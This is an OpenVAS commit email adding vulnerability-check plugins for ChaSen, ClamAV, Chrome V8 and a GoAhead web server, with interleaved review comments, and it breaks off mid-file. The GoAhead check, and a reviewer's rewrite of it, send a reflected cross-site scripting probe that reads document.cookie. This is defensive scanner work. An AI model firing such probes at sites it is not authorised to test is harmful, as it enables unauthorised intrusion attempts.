[Openvas-commits] r12171 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Wed Nov 23 15:12:52 CET 2011
Author: antu123
Date: 2011-11-23 15:12:45 +0100 (Wed, 23 Nov 2011)
New Revision: 12171
Added:
trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl
Log:
Added new plugins and updated gb_sendmail_mail_relay_vuln.nasl
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/ChangeLog 2011-11-23 14:12:45 UTC (rev 12171)
@@ -1,3 +1,19 @@
+2011-11-23 Antu Sanadi <santu at secpod.com>
+
+ * scripts/gb_chasen_bof_vuln_win.nasl,
+ scripts/gb_chasen_bof_vuln_lin.nasl,
+ scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl,
+ scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl,
+ scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl,
+ scripts/secpod_clamav_recursion_dos_vuln_win.nasl,
+ scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl,
+ scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl,
+ scripts/secpod_goahead_webserver_mult_xss_vuln.nasl:
+ Added new plugins.
+
+ * scripts/gb_sendmail_mail_relay_vuln.nasl:
+ Added CVE-2003-0285 and updated description.
+
2011-11-23 Jan-Oliver Wagner <jan-oliver.wagner at greenbone.net>
* scripts/secpod_qemu_detect_lin.nasl: Revised according to CR#57.
Added: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,103 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_chasen_bof_vuln_lin.nasl 18445 2011-11-11 11:11:11Z nov $
+#
+# ChaSen Buffer Overflow Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802344);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-4000");
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-11 14:20:07 +0530 (Fri, 11 Nov 2011)");
+ script_name("ChaSen Buffer Overflow Vulnerability (Lindows)");
+ desc = "
+ Overview: The host is running ChaSen Software and is prone to buffer
+ overflow vulnerability
+
+ Vulnerability Insight:
+ The flaw is caused due to an error when reading user-supplied input string,
+ which allows attackers to execute arbitrary code via a crafted string.
+
+ Impact:
+ Successful exploitation allows remote attackers to cause a buffer overflow
+ or execute arbitrary code.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ ChaSen Version 2.4.x
+
+ Fix: Use ChaSen Version 2.3.3,
+ For Updates Refer, http://chasen.naist.jp/hiki/ChaSen/
+
+ References:
+ http://jvn.jp/en/jp/JVN16901583/index.html
+ http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000099.html ";
+
+ script_description(desc);
+ script_summary("Check for the vulnerable ChaSen version");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Buffer overflow");
+ exit(0);
+}
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+## Open the socket
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+ exit(0);
+}
+
+## Confirm Linux, as SSH can be instslled on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+ exit(0);
+}
+
+chaName = find_file(file_name:"chasen-config", file_path:"/", useregex:TRUE,
+ regexpar:"$", sock:sock);
+
+foreach binaryName (chaName)
+{
+ ## Get the ChaSen version from command
+ chaVer = get_bin_version(full_prog_name:chomp(binaryName), version_argv:"--version",
+ ver_pattern:"[0-9.]+", sock:sock);
+
+ ## Check for ChaSen Version 2.4.x
+ if(chaVer[1] != NULL)
+ {
+ if(version_in_range(version:chaVer[1], test_version:"2.4.0", test_version2:"2.4.4"))
+ {
+ security_hole(0);
+ ssh_close_connection();
+ exit(0);
+ }
+ }
+}
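Review bot: The version test at L146 flags only 2.4.0 through 2.4.4, while the description at L102 says all of 2.4.x is affected and the Fix at L104 tells the user to move to 2.3.3; either a fixed 2.4.x release exists and should be named at L104, or the range at L146 should not stop at 2.4.4, because as written a host on a later 2.4.x is silently reported clean. The script_name at L86 reads `(Lindows)` where the file header at L55 and the sibling Windows script say the OS name, so it should be `script_name("ChaSen Buffer Overflow Vulnerability (Linux)");`. ssh_close_connection() is only reached on the vulnerable path at L149; a host that is not vulnerable, or has no chasen-config at all, leaves the SSH session open, so add `ssh_close_connection();` before the script falls off the end as well. Advising a downgrade to 2.3.3 as the fix for a buffer overflow is unusual and is presumably copied from the JVN entry — worth confirming against it.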
Property changes on: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_chasen_bof_vuln_win.nasl 18445 2011-11-10 17:14:14Z nov $
+#
+# ChaSen Buffer Overflow Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802343);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-4000");
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-09 16:19:55 +0530 (Wed, 09 Nov 2011)");
+ script_name("ChaSen Buffer Overflow Vulnerability (Windows)");
+ desc = "
+ Overview: The host is running ChaSen Software and is prone to buffer
+ overflow vulnerability
+
+ Vulnerability Insight:
+ The flaw is caused due to an error when reading user-supplied input string,
+ which allows attackers to execute arbitrary code via a crafted string.
+
+ Impact:
+ Successful exploitation allows remote attackers to cause a buffer overflow
+ or execute arbitrary code.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ ChaSen Version 2.4.x
+
+ Fix: Use ChaSen Version 2.3.3,
+ For Updates Refer, http://chasen.naist.jp/hiki/ChaSen/
+
+ References:
+ http://jvn.jp/en/jp/JVN16901583/index.html
+ http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000099.html ";
+
+ script_description(desc);
+ script_summary("Check for the vulnerable ChaSen version");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Buffer overflow");
+ script_dependencies("secpod_reg_enum.nasl");
+ script_require_ports(139, 445);
+ exit(0);
+}
+
+include("smb_nt.inc");
+include("version_func.inc");
+include("secpod_smb_func.inc");
+
+## Check for Windows
+if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
+}
+
+key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\chasen";
+if(!registry_key_exists(key:key)){
+ exit(0);
+}
+
+## Get ChaSen version from registry
+chaName = registry_get_sz(key:key, item:"DisplayName");
+if("ChaSen" >< chaName)
+{
+ chaVer = eregmatch(pattern:"ChaSen ([0-9.]+)", string:chaName);
+ if(chaVer[1] != NULL)
+ {
+ if(version_in_range(version:chaVer[1], test_version:"2.4.0", test_version2:"2.4.4")){
+ security_hole(0);
+ }
+ }
+}
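Review bot: Only the native registry path at L242 is consulted; if ChaSen is a 32-bit build installed on 64-bit Windows its uninstall key would live under SOFTWARE\Wow6432Node\... and the script exits at L244 without ever reading a version, so such installs are never flagged. Iterating over both candidate keys fixes that without changing the version logic. The same range/description mismatch as the Linux script applies here: L254 checks 2.4.0–2.4.4 while L214 says "2.4.x" and L216 recommends 2.3.3, so one of the two should be corrected. Also, the script reads `SMB/WindowsVersion` at L238 but does not declare it in script_require_keys, so the scanner cannot skip the script early when the key is absent.

```nasl
## A 32-bit ChaSen on 64-bit Windows registers under Wow6432Node
foreach key (make_list("SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\chasen",
                       "SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\chasen"))
{
  if(!registry_key_exists(key:key)){
    continue;
  }
  ## … unchanged: DisplayName read, eregmatch, version_in_range, security_hole …
}
```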
Property changes on: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Modified: trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -28,8 +28,8 @@
{
script_id(802194);
script_version("$Revision$");
- script_cve_id("CVE-2002-1278");
- script_bugtraq_id(6118);
+ script_cve_id("CVE-2002-1278", "CVE-2003-0285");
+ script_bugtraq_id(6118, 7580);
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"risk_factor", value:"High");
script_tag(name:"last_modification", value:"$Date$");
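Review bot: cvss_base at L275 is left at 7.5 after CVE-2003-0285 is added on L273; if that CVE was scored differently from CVE-2002-1278 the tag should carry the higher of the two, which cannot be verified from this hunk. A one-line comment such as `# cvss_base covers both CVEs; both score 7.5` above L275 would record that this was checked. The enclosing description block begins before this hunk.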
@@ -56,10 +56,14 @@
Affected Software/OS:
Linuxconf versions 1.24 r2, 1.2.5 r3
Linuxconf versions 1.24 r2, 1.2.5 r3 on Conectiva Linux 6.0 through 8
+ IBM AIX versions 4.3, 4.3.1, 4.3.2, 4.3.3, 5.1, 5.1 L, 5.2
Fix: Upgrade to the latest version of Linuxconf version 1.29r1 or later
For updates refer, http://www.solucorp.qc.ca/linuxconf/
+ For IBM AIX, apply the patch from below link
+ ftp://aix.software.ibm.com/aix/efixes/security/sendmail_3_mod.tar.Z
+
References:
http://osvdb.org/6066
http://xforce.iss.net/xforce/xfdb/10554
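Review bot: The Fix section now mixes guidance for two unrelated products — the Linuxconf upgrade at L283 and an AIX sendmail efix at L286 — while the Overview above and the detection logic (outside this hunk) presumably still describe the Linuxconf open-relay case; before AIX is listed as affected at L282 it should be confirmed that the check actually identifies an AIX sendmail relay and that the script title reflects both. The efix at L286 is referenced by a bare ftp:// archive with no integrity information, so the text should direct the reader to the IBM advisory that publishes the fix rather than the tarball alone, e.g. `For IBM AIX, apply the vendor efix as described in the IBM security advisory for sendmail`.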
Added: trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_clamav_recursion_dos_vuln_win.nasl 18582 2011-11-22 17:51:52Z nov $
+#
+# ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902760);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3627");
+ script_bugtraq_id(50183);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-22 17:51:52 +0530 (Tue, 22 Nov 2011)");
+ script_name("ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows)");
+ desc = "
+ Overview: The host is installed with ClamAV and is prone to denial of service
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to the way the bytecode engine handled recursion
+ level when scanning an unpacked file.
+
+ Impact:
+ Successful exploitation will let the attackers to cause a denial of service
+ (crash) via vectors related to recursion level.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ ClamAV before 0.97.3 on Windows.
+
+ Fix: Upgrade to ClamAV version 0.97.3 or later
+ For updates refer, http://www.clamav.net/lang/en/download/
+
+ References:
+ http://www.ubuntu.com/usn/USN-1258-1/
+ https://bugzilla.redhat.com/show_bug.cgi?id=746984
+ http://git.clamav.net/gitweb?p=clamav-devel.git;a=commitdiff;h=3d664817f6ef833a17414a4ecea42004c35cc42f ";
+
+ script_description(desc);
+ script_summary("Check for the Version of ClamAV");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2011 SecPod");
+ script_family("Denial of Service");
+ script_dependencies("gb_clamav_detect_win.nasl");
+ script_require_keys("ClamAV/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+avVer = get_kb_item("ClamAV/Win/Ver");
+if(avVer == NULL){
+ exit(0);
+}
+
+if(version_is_less(version:avVer, test_version:"0.97.3")){
+ security_warning(0);
+}
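Review bot: The Impact text at L342 reads `will let the attackers to cause a denial of service`, which is ungrammatical and does not match the phrasing used by the other scripts in this commit; write `Successful exploitation allows remote attackers to cause a denial of service (crash) via vectors related to recursion level.` The NULL guard at L372 duplicates the script_require_keys gate at L364; it is harmless, but a short comment such as `## defensive: KB key is already required above` would tell the next reader it is deliberate.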
Property changes on: trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_goahead_webserver_mult_xss_vuln.nasl 18585 2011-11-23 12:12:12Z nov $
+#
+# GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902589);
+ script_version("$Revision$");
+ script_bugtraq_id(50729);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-23 12:12:12 +0530 (Wed, 23 Nov 2011)");
+ script_name("GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities");
+ desc = "
+ Overview: This host is running GoAhead Webserver and is prone to multiple
+ cross site scripting vulnerabilities.
+
+ Vulnerability Insight:
+ Multiple flaws are caused due to improper validation of user-supplied input
+ via the 'name' and 'address' parameters in goform/formTest, which allows
+ attackers to execute arbitrary HTML and script code in a user's browser
+ session in the context of an affected site.
+
+ Impact:
+ Successful exploitation will allow remote attackers to insert arbitrary HTML
+ and script code, which will be executed in a user's browser session in the
+ context of an affected site.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ GoAhead Webserver version 2.5
+
+ Fix: No solution or patch is available as on 23rd November 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.goahead.com/products/webserver/default.aspx
+
+ References:
+ http://osvdb.org/77198
+ http://secunia.com/advisories/46896
+ http://webserver.goahead.com/forum/topic/169 ";
+
+ script_description(desc);
+ script_summary("Check if GoAhead Webserver is vulnerable to Cross-Site Scripting");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 SecPod");
+ script_family("Web Servers");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+ exit(0);
+}
+
+## Check Banner And Confirm Application
+banner = get_http_banner(port:port);
+if("Server: GoAhead-Webs" >!< banner) {
+ exit(0);
+}
+
+## Construct Attack Request
+url = "/goform/formTest?name=<script>alert(document.cookie)</script>";
+
+## Try XSS attack and check the response to confirm vulnerability
+if(http_vuln_check(port:port, url:url, check_header: TRUE,
+ pattern:"Name: <script>alert\(document.cookie\)</script>")){
+ security_warning(port);
+}
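Review bot: Only the `name` parameter is exercised at L481, although the title at L423 and the insight at L430 name both `name` and `address`; a build that fixes `name` but still reflects `address` is reported clean. Sending the payload once per parameter closes that gap. The response pattern at L485 is anchored on the `Name: ` label, which presumably differs for the other field (likely `Address: `, to be confirmed against a live instance), so the check below matches the reflected payload itself; this is still tied to the specific formTest page, so a reflection elsewhere on the site would be missed, which is worth stating in a comment.

```nasl
## Both parameters named in the advisory are tested; the label preceding
## the echo differs per field, so match the reflected payload itself
foreach param (make_list("name", "address"))
{
  url = "/goform/formTest?" + param + "=<script>alert(document.cookie)</script>";
  if(http_vuln_check(port:port, url:url, check_header:TRUE,
                     pattern:"<script>alert\(document.cookie\)</script>")){
    security_warning(port);
    exit(0);
  }
}
```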
Property changes on: trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl 18583 2011-11-21 17:43:12 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902636);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3900");
+ script_bugtraq_id(50701);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-11 11:11:11 +0530 (Mon, 14 Nov 2011)");
+ script_name("Google Chrome V8 Remote Code Execution Vulnerability (Linux)");
+ desc = "
+ Overview: The host is installed with Google Chrome and is prone to remote
+ code execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is due to an out-of-bounds write operation error in V8
+ (JavaScript engine) causing memory corruption.
+
+ Impact:
+ Successful exploitation could allow attackers to execute arbitrary code,
+ cause a denial of service.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Google Chrome version prior to 15.0.874.121 on Linux
+
+ Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+ For updates refer, http://www.google.com/chrome
+
+ References:
+ http://osvdb.org/show/osvdb/77193
+ http://secunia.com/advisories/46889/
+ http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+ script_description(desc);
+ script_summary("Check the version of Google Chrome");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_family("General");
+ script_dependencies("gb_google_chrome_detect_lin.nasl");
+ script_require_keys("Google-Chrome/Linux/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("Google-Chrome/Linux/Ver");
+if(!chromeVer){
+ exit(0);
+}
+
+## Check for Google Chrome Version less than 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+ security_hole(0);
+}
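Review bot: The creation_date at L532, `2011-11-11 11:11:11 +0530 (Mon, 14 Nov 2011)`, contradicts itself — 11 Nov 2011 is a Friday (L85 in this same commit spells it out as `Fri, 11 Nov 2011`) while the parenthesised day says Mon, 14 Nov — and the $Id stamp at L499 gives yet another date and lacks the trailing `Z`. Pick one consistent timestamp, e.g. `script_tag(name:"creation_date", value:"2011-11-21 17:43:12 +0530 (Mon, 21 Nov 2011)");` to match L499, so the metadata feeds do not carry a bogus date.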
Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl 18583 2011-11-21 17:55:43 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902637);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3900");
+ script_bugtraq_id(50701);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-21 17:55:43 +0530 (Mon, 21 Nov 2011)");
+ script_name("Google Chrome V8 Remote Code Execution Vulnerability (Mac OS X)");
+ desc = "
+ Overview: The host is installed with Google Chrome and is prone to remote
+ code execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is due to an out-of-bounds write operation error in V8
+ (JavaScript engine) causing memory corruption.
+
+ Impact:
+ Successful exploitation could allow attackers to execute arbitrary code,
+ cause a denial of service.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Google Chrome version prior to 15.0.874.121 on Mac OS X
+
+ Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+ For updates refer, http://www.google.com/chrome
+
+ References:
+ http://osvdb.org/show/osvdb/77193
+ http://secunia.com/advisories/46889/
+ http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+ script_description(desc);
+ script_summary("Check the version of Google Chrome");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_family("General");
+ script_dependencies("gb_google_chrome_detect_macosx.nasl");
+ script_require_keys("GoogleChrome/MacOSX/Version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/MacOSX/Version");
+if(!chromeVer){
+ exit(0);
+}
+
+## Check for Google Chrome Version less than 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+ security_hole(0);
+}
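Review bot: The Impact sentence at L637–L638, `execute arbitrary code, cause a denial of service.`, drops the conjunction; write `Successful exploitation could allow attackers to execute arbitrary code or cause a denial of service.` The same sentence is repeated in the Linux and Windows variants of this script, so the wording should be fixed in all three. The $Id line at L593 is missing the trailing `Z` on the timestamp that the other scripts in this commit carry.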
Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl 18583 2011-11-21 17:12:14 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902635);
